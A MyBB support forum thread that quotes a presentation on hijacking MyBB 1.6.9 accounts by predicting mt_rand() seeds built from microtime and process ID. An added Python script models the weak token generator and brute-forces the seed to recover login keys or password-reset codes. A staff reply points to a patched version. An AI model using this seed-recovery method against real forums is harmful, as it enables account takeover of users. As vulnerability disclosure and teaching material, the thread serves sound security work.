MyBB Community Forums

Full Version: myBB Account Hijacking
Just found this post. Is this a problem for me?

Quote:
1. Hijacking MyBB accounts
Not so random random?

2. Before we start:
● The source codes are from MyBB 1.6.9
● MyBB 1.6.10 is most likely vulnerable to these weaknesses too.
● The presentation is for educational purposes. I'm strongly against any illegal activity. Every weakness that I find is reported to MyBB developers.

3. How to access an account without a password?
● Session hijack?
● Steal a cookie?
● Password re-set?

4. Session hijacking – Where is the session?
Global.php => inc/class_session.php:
Session can't be stolen remotely, because we have a different IP :(

5. Once again. How to access an account without a password?
● Session hijack
● Steal a cookie?
● Password re-set?

6. Stealing a cookie >:)
inc/class_session.php:
So what does a cookie like this look like? From the "load_user" function we know that it is saved as loginkey in the DB:

7. Stealing a cookie >:)
● Because of its name and nature, it might be set during login.
● The login process can be found in the member.php file.
member.php:
● So we know the first part: user ID. How about the $user['loginkey']?
● member.php includes an interesting file called functions_user.php
member.php:

8. Stealing a cookie >:)
● The loginkey is always part of the $user variable (or similar). The newly discovered file could then have some more information about the loginkey.
inc/functions_user.php:
● So the cookie looks like this: [user_id]_[string]

9. Stealing a cookie >:)
● To find out more about our mysterious string, let's have a look at the random_str() function. Because this looks like a regular function, it might be in the inc/functions.php file.
inc/functions.php:
● The array has these characters: a-z, A-Z, 1-9

10. Stealing a cookie >:)
● As you can see, the argument of random_str() is the number of characters in the returned string. In our case 50. So an example string could be:
1_98n6GS6F7xIyf74cI44FXIJHCfyyeEFjGyFKW678265btWzy2k – imagine brute-forcing that.

11. Stealing a cookie >:)
● The characters for the random string are chosen by the my_rand() function ==>

12. Stealing a cookie >:)

13. Stealing a cookie >:)
● As you can see, the final return is computed this way:
$min + (($distance + 1) * (mt_rand() ^ $obfuscator) / (mt_getrandmax() + 1))
● Known variables:
● $min = 0
● $distance = 60
● mt_getrandmax() = 2147483647 (seriously, test it for yourself. 32-bit and 64-bit systems give out the same number)
● Updated formula:
0 + ((60 + 1) * (mt_rand() ^ $obfuscator) / (2147483647 + 1))
● And it gets better!

14. Stealing a cookie >:)
● The my_rand() function uses secure_seed_rng() to seed the mt_rand() function that is being used for output. ==>

15. Stealing a cookie >:)

16. Stealing a cookie >:)
● If PHP can read the /dev/urandom file, we might have a problem.
● But if the forum runs on a Windows server or uses cPanel (and possibly other control panels), it might not be allowed to read this file and the seed will be computed from the microtime() function and the process ID.
● microtime():
● format => msec sec
● example => 0.89574000 1366899417

17. Stealing a cookie >:)
● Back to the my_rand() function. We figured out how the seed is computed, but re-computing it for each character could take time.
inc/functions.php:
● Because of the static variables, the seed is computed only once => We need to brute-force the seed just once and then just re-use it.

18. Stealing a cookie >:)
● However, 50 characters is still enough and we don't know the exact time.
● So how to make this even easier?

19. Password re-set
● When recovering a password, the user has to enter a verification code that is sent to his e-mail.
● This code is generated by the random_str() function.
member.php:
inc/functions.php:
● The activation link looks like:
www.example.ext/member.php?action=resetpassword&uid=[user ID]&code=[activation code]
● We know the exact time of the generation, so all we have to brute-force is the microseconds.

20. Password re-set
● After using the correct activation code, the random password is generated:
member.php:
MyBB registration page:
● Password length will always be equal to or bigger than 8.
● Because we know the time when it was generated, it is easy to brute-force.

21. How to fix this?
● Use a new seed for every character in the string.
● Use openssl_random_pseudo_bytes() instead of mt_rand().
● Make the seed a bit longer or of random length.
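The weakness the quoted slides walk through, as an added example that is not part of the original post, the presentation, or MyBB's own code: a token generator whose PRNG is seeded only from microtime() and the process ID, next to the brute force an attacker runs once the second of generation is known. Everything beyond the slides is an assumption and is marked as such in the code: the crc32 derivation of the fallback seed from the microtime() string and PID, Python's random.Random (MT19937) standing in for PHP's mt_rand(), the obfuscator being derived from the same seed so that only one value has to be guessed, and the constructed timestamp, PID and PID range used in the demo.

```python
# Added example (not code from the quoted slides or from MyBB): a model of a
# token generator whose PRNG is seeded from microtime() and the process ID, and
# the brute force the slides describe. Assumptions not in the original: the way
# the fallback seed is derived from microtime()/pid (crc32 here), Python's
# random.Random (MT19937) standing in for PHP's mt_rand(), and the obfuscator
# being derived from the same seed so only one value has to be guessed.
import random
import zlib

MT_GETRANDMAX = 2147483647          # mt_getrandmax(), as quoted on slide 13
# a-z, A-Z, 1-9 as listed on slide 9: 61 characters, hence $distance = 60
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789"
assert len(CHARSET) == 61


def weak_seed(sec, usec, pid):
    """Fallback seed when /dev/urandom is not readable: the only entropy is the
    microtime() string ("0.89574000 1366899417") and getmypid(). The crc32
    mixing is an assumption standing in for MyBB's own derivation."""
    return zlib.crc32(f"{usec / 1e6:.8f} {sec}{pid}".encode()) & 0xFFFFFFFF


class WeakRNG:
    """Model of my_rand(): seeded once per process (static variable), each draw
    XORed with an obfuscator and scaled with the formula from slide 13."""

    def __init__(self, seed):
        self.mt = random.Random(seed)   # MT19937, like PHP's mt_rand (seeding differs)
        # Assumption: obfuscator derived from the same seed, capped at mt_getrandmax()
        self.obfuscator = zlib.crc32(seed.to_bytes(4, "big")) & MT_GETRANDMAX

    def mt_rand(self):
        return self.mt.getrandbits(31)  # 0 .. mt_getrandmax()

    def my_rand(self, lo, hi):
        distance = hi - lo
        return lo + ((distance + 1) * (self.mt_rand() ^ self.obfuscator)) // (MT_GETRANDMAX + 1)


def random_str(rng, length=50):
    """random_str(): pick `length` characters, each indexed by my_rand(0, 60)."""
    return "".join(CHARSET[rng.my_rand(0, 60)] for _ in range(length))


def issue_token(sec, usec, pid, length=50):
    """Server side: one request seeds once and draws the login key / reset code."""
    return random_str(WeakRNG(weak_seed(sec, usec, pid)), length)


def recover_seed(token, sec, pids, usecs=range(1_000_000)):
    """Attacker side: given a token whose generation second is known (e.g. the
    attacker's own reset code, timestamped by the e-mail) and a set of candidate
    PIDs, enumerate every (usec, pid) pair and return the one that reproduces it.
    Characters are compared one at a time, so a wrong candidate costs about one
    draw. A full second is 10^6 candidates per PID, nowhere near 61^50."""
    for pid in pids:
        for usec in usecs:
            rng = WeakRNG(weak_seed(sec, usec, pid))
            if all(CHARSET[rng.my_rand(0, 60)] == ch for ch in token):
                return usec, pid
    return None


if __name__ == "__main__":
    # Constructed scenario: server clock and PID at the moment the code was issued
    sec, usec, pid = 1366899417, 895740, 4242
    code = issue_token(sec, usec, pid)
    # The second is known; the window is narrowed to 10 000 us and 5 PIDs so the
    # demo finishes in seconds (a real search covers the whole second per PID).
    print(code, recover_seed(code, sec, range(4240, 4245), range(890_000, 900_000)))
```

The point the block makes is the one the slides end on: once the seed is a function of the clock and the PID, the 50-character string is no stronger than the handful of bits that went into the seed, and a reset code issued at a known second is recoverable by enumerating microseconds. The fix the slides propose, seeding from openssl_random_pseudo_bytes() rather than mt_rand(), removes the clock from the equation altogether.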
Quote:
2. Before we start:
● The source codes are from MyBB 1.6.9
● MyBB 1.6.10 is most likely vulnerable to these weaknesses too.

I guess that sums everything up. Upgrade to MyBB 1.6.12 and your forum won't be vulnerable to this.

Also, things like this (security issue descriptions) shouldn't be posted in public, for obvious reasons. Please use Private Inquiries next time: http://community.mybb.com/forum-135.html